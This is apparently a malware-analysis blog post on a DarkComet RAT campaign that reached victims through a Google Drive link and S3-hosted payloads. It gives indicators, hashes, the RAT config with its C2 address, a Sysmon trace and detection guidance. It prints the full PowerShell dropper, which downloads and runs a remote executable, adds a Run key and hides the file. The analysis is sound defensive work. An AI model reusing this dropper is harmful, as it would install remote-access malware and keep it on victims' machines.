Tuesday, March 19, 2019

DarkComet RAT


Recently, i Came across  a malware sample for analysis. Where Google Drive and AWS is used for dropping the malware and leading to infection with Dark Comet RAT campaign.

Dark Comet provides many very similar features to other commercially available RATs and implements the same Client-Server architecture. Servers are built on the Client machine and deployed to as many remote hosts as required, once deployed they will make a connection back to the client and await commands. The Client-side provides an administration console to manage all incoming connections, allowing full command and control capability and file system access. Multiple server ‘profiles’ can be maintained from a single client, and the servers may be updated or uninstalled remotely.

Below is the malware analysis of the  recent Dark Comet RAT campaign observed.

Malware Flow

Email --> Google Drive [drive.google.com/a/uib-saudi.com/file/d/random] --> zip --> image file --> mshta.exe --> powershell / mshta --> http [s3.us-east-2.amazonaws.com /aiite/aiite/gfdsdfghjjhgfvbn.jpg] --> Drop exe in Roaming directory and public directory  --> c2 comms & Exfiltration. 

Malspam

Sender : a.alkady@uib-saudi.com   
Subject  : Re: Confirm Tender Order ##-##-2019-DOCS (Maaden Ammonia III Project in Saudi Arabia)

Link in the email

hxxps://drive.google.com/file/d/1FbOrdVwUlhXsmiEezzgK8TNPA_zHcB8k/view

Content in the Zip file :

IMG-17032019_0824ScanDocs032948948.jpg.lnk        4a0b849d1c102c7cc5cfef5207de025f        
AdvanceOrderConfirmation02394854909854998493.jpg.lnk        f776b9d4c4fa3c3aa5675ab4ab66b5c0        


Network Comms

GET hxxps://s3.us-east-2.amazonaws.com/aiite/out-1204601640.hta
200 OK (application/hta)

GET hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg
200 OK (image/jpeg)

GET hxxps://s3.us-east-2.amazonaws.com/aiite/PaymentTransfer.scr
200 OK (binary/octet-stream)


Powershell

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -WindowStyle hidden -nologo $osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = "$osCheckMajor" + '.' + "$osCheckMinor";$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | %% {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($decoyURL, $decoyPath);Start-Process $decoyPath;Start-Sleep -s 6;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/ImgNewOrder001.exe';$webClient = New-Object System.Net.WebClient;$webDownload = $webClient.DownloadFile($peDirectURL, $savePath)}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | %% {[char]$_});$peName = $randomStr + '.exe';$savePath = "$env:APPDATA" + '\' + "$peName";$decoyName = "$randomStr" + '.jpg';$decoyURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/gfdsdfghjjhgfvbn.jpg';$decoyPath = "$env:APPDATA" + '\' + "$decoyName";Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 6;New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;$peDirectURL = 'hxxps://s3.us-east-2.amazonaws.com/aiite/ImgNewOrder001.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath};Start-Process $savePath;attrib +h +s $savePath;""


Files Dropped

IMG-17032019_0824ScanDocs032948948.jpg.lnk        4a0b849d1c102c7cc5cfef5207de025f        // Content within the zip file from stage 1
AdvanceOrderConfirmation02394854909854998493.jpg.lnk        f776b9d4c4fa3c3aa5675ab4ab66b5c0        // Content within the zip file from stage 1
ero.exe        c6c3ad08a3a70377645a2b748a85a1aa         // dropped as stage 2
uub.exe         c56b5f0201a3b3de53e561fe76912bfd        // Dropped as stage 2
ero        1cffe84c56705f7d9c1854c8ce097fe6        // Packed file 
agpsv.exe        0e06054beb13192588e745ee63a84173         // used to establish persistence
AGP Service        32072e55e2c70c48df0547018368eb4b        // scheduled task
AGP Service Task        fdf7d0d4c401c4671fa29fb0c58fed46        // scheduled task


RAT Config

#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-PG79NDG}
SID={Loften}
FWB={0}
NETDATA={winningstar[.]ddns[.]net:5592|79.134.225[.]23:5592}
GENCODE={mcr2nAsZaT2y}
OFFLINEK={1}
#EOF DARKCOMET DATA --


Flow of Command line execution as recorded in Sysmon .

Combination of mshta, powershell and regsrvc.exe is used to download , execute, hide and establish persistence by the trojan.




C:\Windows\explorer.exe
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" hxxps://s3.us-east-2.amazonaws.com/aiite/out-1204601640.hta
C:\Windows\System32\mshta.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$jNnCcvJikCAD = Get-Random -Min 3 -Max 4;$LyMOnU = ([char[]]([char]97..[char]122));$rwVPDzq = -join ($LyMOnU | Get-Random -Count $jNnCcvJikCAD | %% ..
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Users\Public\ero.exe
"C:\Users\Public\ero.exe"
C:\Users\Public\ero.exe
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
"C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe" vpp=ebt
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe C:\Users\papaya\AppData\Local\Temp\55809232\GAWJV
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "AGP Service" /xml "C:\Users\papaya\AppData\Local\Temp\tmp30A2.tmp"
C:\Users\papaya\AppData\Local\Temp\55809232\uub.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "AGP Service Task" /xml "C:\Users\papaya\AppData\Local\Temp\tmp3110.tmp"
C:\Windows\System32\services.exe
C:\Windows\System32\taskhost.exe
taskhost.exe $(Arg0)


C2  : 79.134.225[.]23

How to Detect

Email control are often tricked with links in the email requiring user intervention to click and run. 

Looking for execution of mshta, regsrvc and powershell execution can lead to detection of this particular malware. Sysmon or command line execution logs can be useful in detecting this behaviour. According to MITRE framework, hunting for following techniques will lead to the detection of this malware.



T1059
Command-Line Interface
Execution
T1012
Query Registry
Discovery
T1063
Security Software Discovery
Discovery
T1086
PowerShell
Execution
T1170
MSHTA
Defense_Evasion,Execution
T1053
Scheduled Task
Persistence,Privilege_Escalation,Execution
T1093
Process Hollowing
Defense_Evasion
T1049
System Network Connections Discovery
Discovery
T1121
Regsvcs/Regasm
Defense_Evasion,Execution
T1060
Registry Run Keys or Start Folder
Persistence
T1158
Hidden_Files_and_Directories
Persistence,Defense_Evasion